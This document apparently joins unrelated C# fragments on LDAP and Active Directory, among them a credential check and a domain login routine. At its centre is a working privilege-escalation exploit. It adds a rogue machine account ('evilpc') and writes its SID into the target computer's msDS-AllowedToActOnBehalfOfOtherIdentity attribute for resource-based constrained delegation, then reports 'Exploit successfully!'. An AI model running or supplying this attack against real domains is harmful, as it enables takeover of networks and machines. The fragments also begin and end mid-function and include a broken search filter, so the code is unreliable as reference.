//int flagExists = Ambito._estCuentaUsuario & 0x2;
//if (flagExists > 0)
//{
// rpta = "La cuenta de usuario se encuentra deshabilitada";
//}
System.DirectoryServices.DirectoryEntry Entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + dominio, usuario, clave);
System.DirectoryServices.DirectorySearcher valSearcher = new System.DirectoryServices.DirectorySearcher(Entry);
valSearcher.SearchScope = System.DirectoryServices.SearchScope.OneLevel;
try
{
System.DirectoryServices.SearchResult Results = valSearcher.FindOne();
}
catch (Exception ex)
{
rpta = ex.Message;
return(rpta);
}
//if (User.Properties.Contains("displayName"))
//{
// Ambito._NombreUsuario = System.Convert.ToString(User.Properties["displayName"][0]);
//}
//if (User.Properties.Contains("title"))
//{
// Ambito._rolUsuario = System.Convert.ToString(User.Properties["title"][0]);
//}
//if (User.Properties.Contains("title"))
//{
// Ambito._dptoUsuario = System.Convert.ToString(User.Properties["title"][0]);
//}
//if (User.Properties.Contains("proxyAddresses"))
//{
// Ambito._correoUsuario = System.Convert.ToString(User.Properties["proxyAddresses"][0]);
//}
//if (User.Properties.Contains("sAMAccountName"))
//{
// Ambito.Usuario = System.Convert.ToString(User.Properties["sAMAccountName"][0]).ToUpper();
//}
rpta = "OK";
}
}
else
{
rpta = "ER";
}
}
}
return(rpta);
}
static void Main(string[] args)
{
String DomainController = "192.168.127.129";
String Domain = "gh0st.com";
//String username = args[0]; //域用户名
//String password = args[1]; //域用户密码
String new_MachineAccount = "evilpc"; //添加的机器账户
String new_MachineAccount_password = "******"; //机器账户密码
String victimcomputer_ldap_path = "LDAP://CN=Computers,DC=gh0st,DC=com";
String machine_account = new_MachineAccount;
String sam_account = machine_account + "$";
String distinguished_name = "";
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
}
Console.WriteLine("[+] Elevate permissions on ");
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
//Console.WriteLine("[+] New SAMAccountName = " + sam_account);
//Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
//连接ldap
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
//NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
System.DirectoryServices.Protocols.LdapConnection connection = null;
//connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
try {
//添加机器账户
connection.SendRequest(request);
Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added");
} catch (System.Exception ex) {
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// 获取新计算机对象的SID
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try {
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
} catch {
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
//设置资源约束委派
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry("redteam.com");
myldapConnection.Path = victimcomputer_ldap_path;
myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
//通过ldap找计算机
search.Filter = "(CN=" + ")";
string[] requiredProperties = new string[] { "samaccountname" };
foreach (String property in requiredProperties)
{
search.PropertiesToLoad.Add(property);
}
System.DirectoryServices.SearchResult result = null;
try {
result = search.FindOne();
} catch (System.Exception ex) {
Console.WriteLine(ex.Message + "Exiting...");
return;
}
if (result != null)
{
System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
String sec_descriptor = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
byte[] descriptor_buffer = new byte[sd.BinaryLength];
sd.GetBinaryForm(descriptor_buffer, 0);
// 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = descriptor_buffer;
try {
entryToUpdate.CommitChanges();//提交更改
Console.WriteLine("[+] Exploit successfully!");
} catch (System.Exception ex) {
Console.WriteLine(ex.Message);
Console.WriteLine("[!] \nFailed...");
return;
}
}
}
// entry may be null, needs to be get fresh in that case
internal ConnectorAttribute GetConnectorAttributeFromADEntry(ObjectClass oclass,
String attributeName, DS.SearchResult searchResult, DirectoryEntry entry)
{
Boolean ourEntry = false;
// Boolean translated = false;
if (searchResult == null)
{
throw new ConnectorException(_configuration.ConnectorMessages.Format(
"ex_AttributeNull",
"Could not add connector attribute to <null> search result"));
}
if (entry == null)
{
ourEntry = true;
entry = searchResult.GetDirectoryEntry();
}
try
{
return(_customHandlers.GetCaFromDe(oclass,
attributeName, searchResult, entry));
}
finally
{
if (ourEntry && entry != null)
{
entry.Dispose();
}
}
}
// LDAP域用户登录部分:包括Windows AD域用户登录
#region public static BaseUserInfo LogOnByLDAP(string domain, string lDAP, string userName, string password, string permissionCode, bool persistCookie, bool formsAuthentication, out string statusCode, out string statusMessage)
/// <summary>
/// 验证LDAP用户
/// </summary>
/// <param name="domain">域</param>
/// <param name="lDAP">LDAP</param>
/// <param name="userName">域用户名</param>
/// <param name="password">域密码</param>
/// <param name="permissionCode">权限编号</param>
/// <param name="persistCookie">是否保存密码</param>
/// <param name="formsAuthentication">表单验证,是否需要重定位</param>
/// <param name="statusCode"></param>
/// <param name="statusMessage"></param>
/// <returns></returns>
public static BaseUserInfo LogOnByLDAP(string domain, string lDAP, string userName, string password, string openId, string permissionCode, bool persistCookie, bool formsAuthentication, out string statusCode, out string statusMessage)
{
DirectoryEntry dirEntry = new DirectoryEntry();
dirEntry.Path = lDAP;
dirEntry.Username = domain + "\\" + userName;
dirEntry.Password = password;
dirEntry.AuthenticationType = AuthenticationTypes.Secure;
try
{
DirectorySearcher dirSearcher = new DirectorySearcher(dirEntry);
dirSearcher.Filter = String.Format("(&(objectClass=user)(samAccountName={0}))", userName);
System.DirectoryServices.SearchResult result = dirSearcher.FindOne();
if (result != null)
{
// 统一的登录服务
DotNetService dotNetService = new DotNetService();
BaseUserInfo userInfo = dotNetService.LogOnService.LogOnByUserName(Utilities.GetUserInfo(), userName, out statusCode, out statusMessage);
//BaseUserInfo userInfo = dotNetService.LogOnService.UserLogOn(Utilities.GetUserInfo(), userName, password, openId, false, out statusCode, out statusMessage);
// 检查身份
if (statusCode.Equals(Status.OK.ToString()))
{
userInfo.IPAddress = GetIPAddress();
bool isAuthorized = true;
// 用户是否有哪个相应的权限
if (!string.IsNullOrEmpty(permissionCode))
{
isAuthorized = dotNetService.PermissionService.IsAuthorized(userInfo, permissionCode, null);
}
// 有相应的权限才可以登录
if (isAuthorized)
{
if (persistCookie)
{
// 相对安全的方式保存登录状态
// SaveCookie(userName, password);
// 内部单点登录方式
SaveCookie(userInfo);
}
else
{
RemoveUserCookie();
}
LogOn(userInfo, formsAuthentication);
}
else
{
statusCode = Status.LogOnDeny.ToString();
statusMessage = "访问被拒绝、您的账户没有后台管理访问权限。";
}
}
return(userInfo);
}
else
{
statusCode = Status.LogOnDeny.ToString();
statusMessage = "应用系统用户不存在,请联系管理员。";
return(null);
}
}
catch (Exception e)
{
//Logon failure: unknown user name or bad password.
statusCode = Status.LogOnDeny.ToString();
statusMessage = "域服务器返回信息" + e.Message.Replace("\r\n", "");
return(null);
}
}
